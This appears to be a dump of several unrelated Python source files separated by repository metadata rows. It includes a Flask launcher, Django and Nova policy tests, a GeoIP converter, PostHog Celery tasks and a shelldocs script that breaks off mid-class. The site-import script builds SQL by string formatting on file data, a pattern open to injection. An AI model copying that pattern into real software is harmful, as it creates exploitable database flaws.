# $Author: jiakai <jia.kai66@gmail.com>
from webapi import get_app
import signal
import sys
import os
import os.path
def sigint_handler(s, f):
"""receive the SIGINT signal from unittest script
and exit correctly"""
print('api standalone server: SIGINT received, exit')
sys.exit()
def main():
signal.signal(signal.SIGINT, sigint_handler)
app = get_app()
try:
app.config.from_pyfile('../manage/api_website_config.py')
except IOError as e:
print e
print 'WARNING: No configuration found, using builtin defaults.'
app.run(app.config['API_HOST'], app.config['API_PORT'],
**app.config['API_RUN_OPTIONS'])
if __name__ == "__main__":
main()
| 22.971429 | 72 | 0.66791 |
89a4be4179240d1849ffa6797328faacea1f97d4 | 3,089 | py | Python | devilry/devilry_qualifiesforexam/tests/test_models.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 29 | 2015-01-18T22:56:23.000Z | 2020-11-10T21:28:27.000Z | devilry/devilry_qualifiesforexam/tests/test_models.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 786 | 2015-01-06T16:10:18.000Z | 2022-03-16T11:10:50.000Z | devilry/devilry_qualifiesforexam/tests/test_models.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 15 | 2015-04-06T06:18:43.000Z | 2021-02-24T12:28:30.000Z | # 3rd party imports
from model_bakery import baker
# Django imports
from django import test
from django.core.exceptions import ValidationError
# Devilry imports
from devilry.devilry_qualifiesforexam import models as status_models
class TestStatus(test.TestCase):
def test_notready_no_message(self):
test_status = baker.make('devilry_qualifiesforexam.Status', status=status_models.Status.NOTREADY)
with self.assertRaisesMessage(ValidationError, 'Message can not be empty when status is ``notready``.'):
test_status.full_clean()
def test_ready_no_message_and_no_plugin(self):
test_status = baker.make('devilry_qualifiesforexam.Status', status=status_models.Status.READY)
with self.assertRaisesMessage(ValidationError, 'A ``message`` is required when no ``plugin`` is specified. '
'The message should explain why a plugin is not used.'):
test_status.full_clean()
def test_notready_no_plugin(self):
test_status = baker.make('devilry_qualifiesforexam.Status', status=status_models.Status.NOTREADY,
message='No plugin', plugin='some.plugin')
with self.assertRaisesMessage(ValidationError, '``plugin`` is not allowed when status is ``notready``.'):
test_status.full_clean()
def test_get_current_status_no_status_for_period(self):
testperiod = baker.make_recipe('devilry.apps.core.period_active')
last_status = status_models.Status.objects.get_last_status_in_period(period=testperiod)
self.assertIsNone(last_status)
def test_get_current_status(self):
testperiod = baker.make_recipe('devilry.apps.core.period_active')
baker.make('devilry_qualifiesforexam.Status',
period=testperiod,
status=status_models.Status.READY,
plugin='plugin')
last_status = baker.make('devilry_qualifiesforexam.Status',
period=testperiod,
status=status_models.Status.READY,
plugin='plugin')
current_status = status_models.Status.objects.get_last_status_in_period(period=testperiod)
self.assertEqual(current_status, last_status)
def test_get_qualified_students(self):
testperiod = baker.make_recipe('devilry.apps.core.period_active')
teststatus = baker.make('devilry_qualifiesforexam.Status',
period=testperiod,
status=status_models.Status.READY,
plugin='plugin')
baker.make('devilry_qualifiesforexam.QualifiesForFinalExam',
status=teststatus,
qualifies=True,
_quantity=10)
baker.make('devilry_qualifiesforexam.QualifiesForFinalExam',
status=teststatus,
qualifies=False,
_quantity=10)
self.assertEqual(10, len(teststatus.get_qualified_students()))
| 48.265625 | 116 | 0.650372 |
d08944cf744fc23743ec9db0176bf1b5e34223cc | 1,333 | py | Python | .history/run_update_20220325105025.py | miguel-fresh/geoip-translation | ccf9dbc0330e597704e57d8b2967fc9be16017ed | [
"Info-ZIP"
] | null | null | null | .history/run_update_20220325105025.py | miguel-fresh/geoip-translation | ccf9dbc0330e597704e57d8b2967fc9be16017ed | [
"Info-ZIP"
] | null | null | null | .history/run_update_20220325105025.py | miguel-fresh/geoip-translation | ccf9dbc0330e597704e57d8b2967fc9be16017ed | [
"Info-ZIP"
] | null | null | null | import subprocess
from sys import stderr, stdout
from pathlib import Path
from os import rename, getcwd, path
START_DOWNLOAD = False
START_CONVERT = True
CURRENT_DIR = Path(getcwd())
ZIP_NAME = 'GeoLite2-City-CSV.zip'
# Relative (to current dir) paths to
DOWNLOAD_DIRNAME = './data'
OUTPUT_DIRNAME = './output'
DOWNLOAD_ABSPATH = CURRENT_DIR.joinpath(DOWNLOAD_DIRNAME)
OUTPUT_ABSPATH = CURRENT_DIR.joinpath(OUTPUT_DIRNAME)
if START_DOWNLOAD:
# Download .zip
download_output = subprocess.run(['composer', 'update', 'tronovav/geoip2-update'],
capture_output=True,
shell=True,
cwd='./geoip2-update')
print(download_output)
# TODO: Rename .zip to GeoLite2-City-CSV.zip
# Convert format
if START_CONVERT:
# python geolite2legacy.py -i GeoLite2-City-CSV.zip -o GeoLiteCity.dat -f geoname2fips.csv
downloaded_zip_asbpath = CURRENT_DIR.joinpath(ZIP_NAME)
update_output = subprocess.run(['python', 'geolite2legacy.py',
'-i', downloaded_zip_asbpath,
'-o', OUTPUT_ABSPATH,
'-f', 'geoname2fips.csv'],
cwd='./geolite2legacy')
print(update_output)
| 30.295455 | 94 | 0.606152 |
a969f5c642f00dbee7ccad96ee61cba6a4d60233 | 1,938 | py | Python | 1SiteRanking/Data Collection/create_site_table.py | HCH2CHO/EmotionMap | bc572b4182637dcdd65e9a13c92f2fa0d9a3d680 | [
"MIT"
] | 3 | 2021-07-15T15:58:52.000Z | 2021-07-16T13:22:47.000Z | 1SiteRanking/Data Collection/create_site_table.py | HCH2CHO/EmotionMap | bc572b4182637dcdd65e9a13c92f2fa0d9a3d680 | [
"MIT"
] | null | null | null | 1SiteRanking/Data Collection/create_site_table.py | HCH2CHO/EmotionMap | bc572b4182637dcdd65e9a13c92f2fa0d9a3d680 | [
"MIT"
] | 4 | 2017-08-04T12:41:06.000Z | 2019-01-31T14:55:10.000Z | # coding:utf-8
# version:python3.5.1
# author:kyh
# import geodata csv files to cloud database
import psycopg2
class CloudDatabase(object):
# Init database and input ip
# 初始化数据库并传入ip
def __init__(self, database, user, password, ip="127.0.0.1", port="5432"):
self.database = database
self.user = user
self.password = password
self.ip = ip
self.port = port
# Connect database and set input as host, return connection and cursor
# 连接ip端数据库并返回connection和cursor
def db_connect(self):
self.connection = psycopg2.connect(database=self.database, user=self.user,
password=self.password, host=self.ip, port=self.port)
self.cursor = self.connection.cursor()
# Write log file
# 输出日志
def write_log(self, e):
self.connection.rollback()
with open("log.txt", 'a') as log_file:
log_file.writelines(str(e))
# Copy files to database
# 将csv文件导入数据库
def import_site(self, filepath):
with open(filepath,'r') as file:
for site in file.readlines():
id = site.split('\t')[0]
name = site.split('\t')[1]
lat = site.split('\t')[2]
lon = site.split('\t')[3].split('\n')[0]
try:
sql_command="INSERT INTO site VALUES ({0},'{1}',{2},{3});".format(id,name,lat,lon)
self.cursor.execute(sql_command)
self.connection.commit()
except Exception as e:
self.write_log(e)
if __name__ == '__main__':
try:
# 连接本地数据库
database = CloudDatabase("EmotionMap3", "postgres", "postgres", "127.0.0.1")
database.db_connect()
database.import_site(r'site_info.txt')
except Exception as e:
with open("log.txt", 'a') as log_file:
log_file.writelines(str(e)) | 33.413793 | 102 | 0.567079 |
73393ef24973b90f829aa6cd5b5b08e08245e81d | 2,200 | py | Python | setup.py | puneeth714/FinRL | ec71c84342f7b78cf91d5c32e16e5fc88f24bc56 | [
"MIT"
] | 1,949 | 2020-09-23T03:02:10.000Z | 2021-04-12T18:43:35.000Z | setup.py | puneeth714/FinRL | ec71c84342f7b78cf91d5c32e16e5fc88f24bc56 | [
"MIT"
] | 154 | 2020-09-23T03:05:09.000Z | 2021-04-11T23:57:16.000Z | setup.py | puneeth714/FinRL | ec71c84342f7b78cf91d5c32e16e5fc88f24bc56 | [
"MIT"
] | 478 | 2020-10-14T19:01:14.000Z | 2021-04-12T17:36:02.000Z | from setuptools import setup, find_packages
# Read requirements.txt, ignore comments
try:
REQUIRES = list()
f = open("requirements.txt", "rb")
for line in f.read().decode("utf-8").split("\n"):
line = line.strip()
if "#" in line:
line = line[: line.find("#")].strip()
if line:
REQUIRES.append(line)
except:
print("'requirements.txt' not found!")
REQUIRES = list()
setup(
name="finrl",
version="0.3.3",
include_package_data=True,
author="Hongyang Yang, Xiaoyang Liu",
author_email="hy2500@columbia.edu",
url="https://github.com/finrl/finrl-library",
license="MIT",
packages=find_packages(),
install_requires=REQUIRES
+ ["pyfolio @ git+https://github.com/quantopian/pyfolio.git#egg=pyfolio-0.9.2"]
+ ["elegantrl @ git+https://github.com/AI4Finance-Foundation/ElegantRL.git#egg=elegantrl"],
# dependency_links=['git+https://github.com/quantopian/pyfolio.git#egg=pyfolio-0.9.2'],
#install_requires=REQUIRES,
description="FinRL library, a Deep Reinforcement Learning library designed specifically for automated stock trading.",
long_description="""finrl is a Python library for that facilitates beginners to expose themselves to quantitative finance
and to develop their own trading strategies, it is developed by `AI4Finance`_.
FinRL has been developed under three primary principles: completeness, hands-on tutorial and reproducibility.
.. _AI4Finance: https://github.com/AI4Finance-Foundation
""",
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
],
keywords="Reinforcment Learning",
platform=["any"],
python_requires=">=3.6",
)
| 40 | 126 | 0.66 |
35f451087d4aec96abfe5a339b4bcd07dc759587 | 3,539 | py | Python | nova/tests/unit/policies/test_extensions.py | zjzh/nova | 7bb21723171c59b93e28f5d508c2b6df39220f13 | [
"Apache-2.0"
] | 1,874 | 2015-01-04T05:18:34.000Z | 2022-03-31T03:30:28.000Z | nova/tests/unit/policies/test_extensions.py | zjzh/nova | 7bb21723171c59b93e28f5d508c2b6df39220f13 | [
"Apache-2.0"
] | 40 | 2015-04-13T02:32:42.000Z | 2022-02-16T02:28:06.000Z | nova/tests/unit/policies/test_extensions.py | zjzh/nova | 7bb21723171c59b93e28f5d508c2b6df39220f13 | [
"Apache-2.0"
] | 1,996 | 2015-01-04T15:11:51.000Z | 2022-03-31T11:03:13.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.openstack.compute import extension_info
from nova.policies import extensions as policies
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit.policies import base
class ExtensionsPolicyTest(base.BasePolicyTest):
"""Test Extensions APIs policies with all possible context.
This class defines the set of context with different roles
which are allowed and not allowed to pass the policy checks.
With those set of context, it will call the API operation and
verify the expected behaviour.
"""
def setUp(self):
super(ExtensionsPolicyTest, self).setUp()
self.controller = extension_info.ExtensionInfoController()
self.req = fakes.HTTPRequest.blank('')
# Check that everyone is able to get extension info.
self.everyone_authorized_contexts = [
self.legacy_admin_context, self.system_admin_context,
self.project_admin_context, self.project_member_context,
self.project_reader_context, self.project_foo_context,
self.other_project_reader_context,
self.system_member_context, self.system_reader_context,
self.system_foo_context,
self.other_project_member_context
]
self.everyone_unauthorized_contexts = []
def test_list_extensions_policy(self):
rule_name = policies.BASE_POLICY_NAME
self.common_policy_check(self.everyone_authorized_contexts,
self.everyone_unauthorized_contexts,
rule_name,
self.controller.index,
self.req)
def test_show_extensions_policy(self):
rule_name = policies.BASE_POLICY_NAME
self.common_policy_check(self.everyone_authorized_contexts,
self.everyone_unauthorized_contexts,
rule_name,
self.controller.show,
self.req, 'os-volumes')
class ExtensionsScopeTypePolicyTest(ExtensionsPolicyTest):
"""Test Extensions APIs policies with system scope enabled.
This class set the nova.conf [oslo_policy] enforce_scope to True
so that we can switch on the scope checking on oslo policy side.
It defines the set of context with scoped token
which are allowed and not allowed to pass the policy checks.
With those set of context, it will run the API operation and
verify the expected behaviour.
"""
def setUp(self):
super(ExtensionsScopeTypePolicyTest, self).setUp()
self.flags(enforce_scope=True, group="oslo_policy")
class ExtensionsNoLegacyPolicyTest(ExtensionsScopeTypePolicyTest):
"""Test Extensions APIs policies with system scope enabled,
and no more deprecated rules that allow the legacy admin API to
access system_admin_or_owner APIs.
"""
without_deprecated_rules = True
| 43.158537 | 78 | 0.68833 |
ca44b6c6d3d1297d667b1609df228e074eba3d4d | 3,694 | py | Python | days/day006/cheapest_path.py | alex-vegan/100daysofcode-with-python-course | b6c12316abe18274b7963371b8f0ed2fd549ef07 | [
"MIT"
] | 2 | 2018-10-28T17:12:37.000Z | 2018-10-28T17:12:39.000Z | days/day006/cheapest_path.py | alex-vegan/100daysofcode-with-python-course | b6c12316abe18274b7963371b8f0ed2fd549ef07 | [
"MIT"
] | 3 | 2018-10-28T17:11:04.000Z | 2018-10-29T22:36:36.000Z | days/day006/cheapest_path.py | alex-vegan/100daysofcode-with-python-course | b6c12316abe18274b7963371b8f0ed2fd549ef07 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sun Sep 30 17:43:45 2018
100DaysOfCode --- TalkPython --- Pybites
4-6days --- collections module
@author: Alexey Sidorov
"""
from collections import deque
#this graph contains all adjacent cities with cost for flight
bonds = {'Yekaterinburg': {'Kiev':101, 'St Peterburg':85, 'Moscow':65, 'Georgia':100},
'Kiev': {'Yekaterinburg':101, 'Berlin':60, 'Vienna':50, 'Sofia':50, 'Georgia':70},
'Rome': {'Paris':50, 'Madrid':60, 'Berlin':55, 'Sofia':40},
'Paris': {'Madrid':50, 'London':15, 'Berlin':40, 'Rome':50},
'Berlin': {'Paris':40, 'Rome':55, 'Vienna':25, 'Kiev':60, 'Moscow':80},
'London': {'Paris':15, 'Oslo':55},
'Oslo': {'London':55, 'Helsinki':40},
'Helsinki': {'Oslo':40, 'Moscow':45, 'St Peterburg':15},
'St Peterburg': {'Helsinki':15, 'Moscow':30, 'Yekaterinburg':85},
'Moscow': {'Yekaterinburg':65, 'St Peterburg':30, 'Helsinki':45, 'Georgia':80, 'Berlin':80, 'Vienna':85},
'Vienna': {'Madrid':80, 'Berlin':25, 'Sofia':40, 'Kiev':50, 'Moscow':85},
'Sofia': {'Rome':40, 'Vienna':40, 'Kiev':50, 'Istanbul':25},
'Istanbul': {'Sofia':25, 'Georgia':60},
'Georgia': {'Istanbul':60, 'Kiev':70, 'Moscow':80, 'Yekaterinburg':100},
'Madrid': {'Paris':50, 'Vienna':80, 'Rome':60}}
START_CITY = 'Yekaterinburg'
FINISH_CITY = 'Madrid'
def dijkstra(bond_grapth, start_city=START_CITY):
que_que = deque() # queue type from collection module
cheapest_paths = {} # shortest path dict
cheapest_paths[start_city] = 0
que_que.append(start_city)
while que_que:
v = que_que.popleft() # one vertex from queue yet
for u in bond_grapth[v]: # neighbours of city
if (u not in cheapest_paths or cheapest_paths[v] + bond_grapth[v][u] < cheapest_paths[u]):
cheapest_paths[u] = cheapest_paths[v] + bond_grapth[v][u]
que_que.append(u)
return cheapest_paths
def reveal_cheapest_path(bond_grapth, cheapest_paths, finish_city=FINISH_CITY):
cheapest_path = [finish_city]
v = finish_city # vertex of graph in the end of shortest path list
while cheapest_paths[v] != 0:
for u in bond_grapth[v]: # neighbours of current city
if cheapest_paths[v] - bond_grapth[v][u] == cheapest_paths[u]:
cheapest_path.append(u)
break
v = u
return cheapest_path
def main():
'''
this function counts of flight cost between cities
1) first input start city from list:
Yekaterinburg, Kiev, Rome, Paris, Berlin, London, Oslo, Helsinki,
St Peterburg, Moscow, Vienna, Sofia, Istanbul, Georgia, Madrid
!!! be sure that name of city start from Capital letter !!!
2) second input stop city from same list
3) receive path and cost of it
'''
start = input("From what city to start? ")
while start not in bonds:
start = input("That city isn't possible for flight. " +
"From what city to start? ")
cheapest_paths = dijkstra(bonds, start)
finish = input("To what city to build the path? ")
while finish not in bonds:
finish = input("That city isn't possible for flight. " +
"To what city to build the path? ")
cheapest_path = reveal_cheapest_path(bonds, cheapest_paths, finish)
print('\ncheapest path is {}\ncheapest path cost'
' = {}$'.format(str(cheapest_path[::-1]), str(cheapest_paths[finish])))
return None
if __name__ == "__main__":
main()
| 41.044444 | 115 | 0.59556 |
a7828252fefa8092c89f3c9d130fab711fdfe972 | 1,606 | py | Python | doit_doc_template/templates/base/library/cmd_skip.py | i386x/abcdoc | 04246ce33a480ce3039832db80d0f5c86a86ff54 | [
"MIT"
] | null | null | null | doit_doc_template/templates/base/library/cmd_skip.py | i386x/abcdoc | 04246ce33a480ce3039832db80d0f5c86a86ff54 | [
"MIT"
] | null | null | null | doit_doc_template/templates/base/library/cmd_skip.py | i386x/abcdoc | 04246ce33a480ce3039832db80d0f5c86a86ff54 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#! \file ~/doit_doc_template/templates/base/library/cmd_skip.py
#! \author Jiří Kučera, <sanczes AT gmail.com>
#! \stamp 2019-07-20 11:55:57 +0200
#! \project DoIt! Doc: Sphinx Extension for DoIt! Documentation
#! \license MIT
#! \version See doit_doc_template.__version__
#! \brief See __doc__
#
"""\
skip command.\
"""
__license__ = """\
Copyright (c) 2014 - 2019 Jiří Kučera.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
IN THE SOFTWARE.\
"""
from docutils.nodes import SkipNode
def cmd_skip(action, context):
"""
"""
raise SkipNode
#-def
| 39.170732 | 79 | 0.732254 |
474259ec861e6553b3f07a33fbbb3b5647d62ae0 | 9,243 | py | Python | posthog/celery.py | atbe/posthog | c98b4eb7da13a269f3ff885a22dd471fc70162ca | [
"MIT"
] | null | null | null | posthog/celery.py | atbe/posthog | c98b4eb7da13a269f3ff885a22dd471fc70162ca | [
"MIT"
] | null | null | null | posthog/celery.py | atbe/posthog | c98b4eb7da13a269f3ff885a22dd471fc70162ca | [
"MIT"
] | null | null | null | import os
import time
import statsd
from celery import Celery
from celery.schedules import crontab
from django.conf import settings
from django.db import connection
from django.utils import timezone
from posthog.ee import is_ee_enabled
from posthog.redis import get_client
# set the default Django settings module for the 'celery' program.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "posthog.settings")
app = Celery("posthog")
# Using a string here means the worker doesn't have to serialize
# the configuration object to child processes.
# - namespace='CELERY' means all celery-related configuration keys
# should have a `CELERY_` prefix.
app.config_from_object("django.conf:settings", namespace="CELERY")
# Load task modules from all registered Django app configs.
app.autodiscover_tasks()
# Make sure Redis doesn't add too many connections
# https://stackoverflow.com/questions/47106592/redis-connections-not-being-released-after-celery-task-is-complete
app.conf.broker_pool_limit = 0
# How frequently do we want to calculate action -> event relationships if async is enabled
ACTION_EVENT_MAPPING_INTERVAL_SECONDS = settings.ACTION_EVENT_MAPPING_INTERVAL_SECONDS
# How frequently do we want to calculate event property stats if async is enabled
EVENT_PROPERTY_USAGE_INTERVAL_SECONDS = settings.EVENT_PROPERTY_USAGE_INTERVAL_SECONDS
# How frequently do we want to check if dashboard items need to be recalculated
UPDATE_CACHED_DASHBOARD_ITEMS_INTERVAL_SECONDS = settings.UPDATE_CACHED_DASHBOARD_ITEMS_INTERVAL_SECONDS
if settings.STATSD_HOST is not None:
statsd.Connection.set_defaults(host=settings.STATSD_HOST, port=settings.STATSD_PORT)
@app.on_after_configure.connect
def setup_periodic_tasks(sender, **kwargs):
if not settings.DEBUG:
sender.add_periodic_task(1.0, redis_celery_queue_depth.s(), name="1 sec queue probe", priority=0)
# Heartbeat every 10sec to make sure the worker is alive
sender.add_periodic_task(10.0, redis_heartbeat.s(), name="10 sec heartbeat", priority=0)
# update events table partitions twice a week
sender.add_periodic_task(
crontab(day_of_week="mon,fri", hour=0, minute=0), update_event_partitions.s(), # check twice a week
)
if getattr(settings, "MULTI_TENANCY", False) and not is_ee_enabled():
sender.add_periodic_task(crontab(minute=0, hour="*/12"), run_session_recording_retention.s())
# send weekly status report on non-PostHog Cloud instances
if not getattr(settings, "MULTI_TENANCY", False):
sender.add_periodic_task(crontab(day_of_week="mon", hour=0, minute=0), status_report.s())
# Cloud (posthog-cloud) cron jobs
if getattr(settings, "MULTI_TENANCY", False):
sender.add_periodic_task(crontab(hour=0, minute=0), calculate_billing_daily_usage.s()) # every day midnight UTC
# send weekly email report (~ 8:00 SF / 16:00 UK / 17:00 EU)
sender.add_periodic_task(crontab(day_of_week="mon", hour=15, minute=0), send_weekly_email_report.s())
sender.add_periodic_task(crontab(day_of_week="fri", hour=0, minute=0), clean_stale_partials.s())
sender.add_periodic_task(
UPDATE_CACHED_DASHBOARD_ITEMS_INTERVAL_SECONDS, check_cached_items.s(), name="check dashboard items"
)
if is_ee_enabled():
sender.add_periodic_task(120, clickhouse_lag.s(), name="clickhouse table lag")
sender.add_periodic_task(120, clickhouse_row_count.s(), name="clickhouse events table row count")
sender.add_periodic_task(120, clickhouse_part_count.s(), name="clickhouse table parts count")
sender.add_periodic_task(120, calculate_cohort.s(), name="recalculate cohorts")
if settings.ASYNC_EVENT_ACTION_MAPPING:
sender.add_periodic_task(
ACTION_EVENT_MAPPING_INTERVAL_SECONDS,
calculate_event_action_mappings.s(),
name="calculate event action mappings",
expires=ACTION_EVENT_MAPPING_INTERVAL_SECONDS,
)
if settings.ASYNC_EVENT_PROPERTY_USAGE:
sender.add_periodic_task(
EVENT_PROPERTY_USAGE_INTERVAL_SECONDS,
calculate_event_property_usage.s(),
name="calculate event property usage",
)
@app.task(ignore_result=True)
def redis_heartbeat():
get_client().set("POSTHOG_HEARTBEAT", int(time.time()))
CLICKHOUSE_TABLES = [
"events",
"sharded_events",
"person",
"sharded_person",
"person_distinct_id",
"sharded_person_distinct_id",
"session_recording_events",
"sharded_session_recording_events",
]
@app.task(ignore_result=True)
def clickhouse_lag():
if is_ee_enabled() and settings.EE_AVAILABLE:
from ee.clickhouse.client import sync_execute
for table in CLICKHOUSE_TABLES:
try:
QUERY = (
"""select max(_timestamp) observed_ts, now() now_ts, now() - max(_timestamp) as lag from {table};"""
)
query = QUERY.format(table=table)
lag = sync_execute(query)[0][2]
g = statsd.Gauge("%s_posthog_celery" % (settings.STATSD_PREFIX,))
g.send("clickhouse_{table}_table_lag_seconds".format(table=table), lag)
except:
pass
else:
pass
@app.task(ignore_result=True)
def clickhouse_row_count():
if is_ee_enabled() and settings.EE_AVAILABLE:
from ee.clickhouse.client import sync_execute
for table in CLICKHOUSE_TABLES:
try:
QUERY = """select count(1) freq from {table};"""
query = QUERY.format(table=table)
rows = sync_execute(query)[0][0]
g = statsd.Gauge("%s_posthog_celery" % (settings.STATSD_PREFIX,))
g.send("clickhouse_{table}_table_row_count".format(table=table), rows)
except:
pass
else:
pass
@app.task(ignore_result=True)
def clickhouse_part_count():
if is_ee_enabled() and settings.EE_AVAILABLE:
from ee.clickhouse.client import sync_execute
QUERY = """
select table, count(1) freq
from system.parts
group by table
order by freq desc;
"""
rows = sync_execute(QUERY)
for (table, parts) in rows:
g = statsd.Gauge("%s_posthog_celery" % (settings.STATSD_PREFIX,))
g.send("clickhouse_{table}_table_parts_count".format(table=table), parts)
else:
pass
@app.task(ignore_result=True)
def redis_celery_queue_depth():
try:
g = statsd.Gauge("%s_posthog_celery" % (settings.STATSD_PREFIX,))
llen = get_client().llen("celery")
g.send("queue_depth", llen)
except:
# if we can't connect to statsd don't complain about it.
# not every installation will have statsd available
return
@app.task(ignore_result=True)
def update_event_partitions():
with connection.cursor() as cursor:
cursor.execute(
"DO $$ BEGIN IF (SELECT exists(select * from pg_proc where proname = 'update_partitions')) THEN PERFORM update_partitions(); END IF; END $$"
)
@app.task(ignore_result=True)
def clean_stale_partials():
"""Clean stale (meaning older than 7 days) partial social auth sessions."""
from social_django.models import Partial
Partial.objects.filter(timestamp__lt=timezone.now() - timezone.timedelta(7)).delete()
@app.task(ignore_result=True)
def status_report():
from posthog.tasks.status_report import status_report
status_report()
@app.task(ignore_result=True)
def run_session_recording_retention():
from posthog.tasks.session_recording_retention import session_recording_retention_scheduler
session_recording_retention_scheduler()
@app.task(ignore_result=True)
def calculate_event_action_mappings():
from posthog.tasks.calculate_action import calculate_actions_from_last_calculation
calculate_actions_from_last_calculation()
@app.task(ignore_result=True)
def calculate_cohort():
from posthog.tasks.calculate_cohort import calculate_cohorts
calculate_cohorts()
@app.task(ignore_result=True)
def check_cached_items():
from posthog.tasks.update_cache import update_cached_items
update_cached_items()
@app.task(ignore_result=True)
def update_cache_item_task(key: str, cache_type, payload: dict) -> None:
from posthog.tasks.update_cache import update_cache_item
update_cache_item(key, cache_type, payload)
@app.task(ignore_result=True)
def send_weekly_email_report():
if settings.EMAIL_REPORTS_ENABLED:
from posthog.tasks.email import send_weekly_email_reports
send_weekly_email_reports()
@app.task(ignore_result=True, bind=True)
def debug_task(self):
print("Request: {0!r}".format(self.request))
@app.task(ignore_result=True)
def calculate_event_property_usage():
from posthog.tasks.calculate_event_property_usage import calculate_event_property_usage
calculate_event_property_usage()
@app.task(ignore_result=True)
def calculate_billing_daily_usage():
try:
from multi_tenancy.tasks import compute_daily_usage_for_organizations # noqa: F401
except ImportError:
pass
else:
compute_daily_usage_for_organizations()
| 33.857143 | 152 | 0.718057 |
db5c3ed492360b640a433a79ae54ee1783e3d091 | 14,471 | py | Python | shelldocs/shelldocs.py | lucaskanashiro/yetus | 27a1a998202b58184b369d8c92d2723019163839 | [
"Apache-2.0"
] | null | null | null | shelldocs/shelldocs.py | lucaskanashiro/yetus | 27a1a998202b58184b369d8c92d2723019163839 | [
"Apache-2.0"
] | 2 | 2021-09-27T23:07:24.000Z | 2022-02-26T05:38:49.000Z | shelldocs/shelldocs.py | lucaskanashiro/yetus | 27a1a998202b58184b369d8c92d2723019163839 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python -B
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
import sys
from optparse import OptionParser
ASFLICENSE = '''
<!---
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
-->
'''
def docstrip(key, dstr):
'''remove extra spaces from shelldoc phrase'''
dstr = re.sub("^## @%s " % key, "", dstr)
dstr = dstr.lstrip()
dstr = dstr.rstrip()
return dstr
def toc(tlist):
'''build a table of contents'''
tocout = []
header = ()
for i in tlist:
if header != i.getinter():
header = i.getinter()
line = " * %s\n" % (i.headerbuild())
tocout.append(line)
line = " * [%s](#%s)\n" % (i.getname().replace("_", r"\_"),
i.getname())
tocout.append(line)
return tocout
class ShellFunction(object):
"""a shell function"""
def __init__(self, filename):
'''Initializer'''
self.name = None
self.audience = None
self.stability = None
self.replaceb = None
self.returnt = None
self.desc = None
self.params = None
self.filename = filename
self.linenum = 0
def __cmp__(self, other):
'''comparison'''
if self.audience == other.audience:
if self.stability == other.stability:
if self.replaceb == other.replaceb:
return cmp(self.name, other.name)
else:
if self.replaceb == "Yes":
return -1
else:
if self.stability == "Stable":
return -1
else:
if self.audience == "Public":
return -1
return 1
def reset(self):
'''empties current function'''
self.name = None
self.audience = None
self.stability = None
self.replaceb = None
self.returnt = None
self.desc = None
self.params = None
self.linenum = 0
self.filename = None
def getfilename(self):
'''get the name of the function'''
if self.filename is None:
return "undefined"
else:
return self.filename
def setname(self, text):
'''set the name of the function'''
definition = text.split()
self.name = definition[1]
def getname(self):
'''get the name of the function'''
if self.name is None:
return "None"
else:
return self.name
def setlinenum(self, linenum):
'''set the line number of the function'''
self.linenum = linenum
def getlinenum(self):
'''get the line number of the function'''
return self.linenum
def setaudience(self, text):
'''set the audience of the function'''
self.audience = docstrip("audience", text)
self.audience = self.audience.capitalize()
def getaudience(self):
'''get the audience of the function'''
if self.audience is None:
return "None"
else:
return self.audience
def setstability(self, text):
'''set the stability of the function'''
self.stability = docstrip("stability", text)
self.stability = self.stability.capitalize()
def getstability(self):
'''get the stability of the function'''
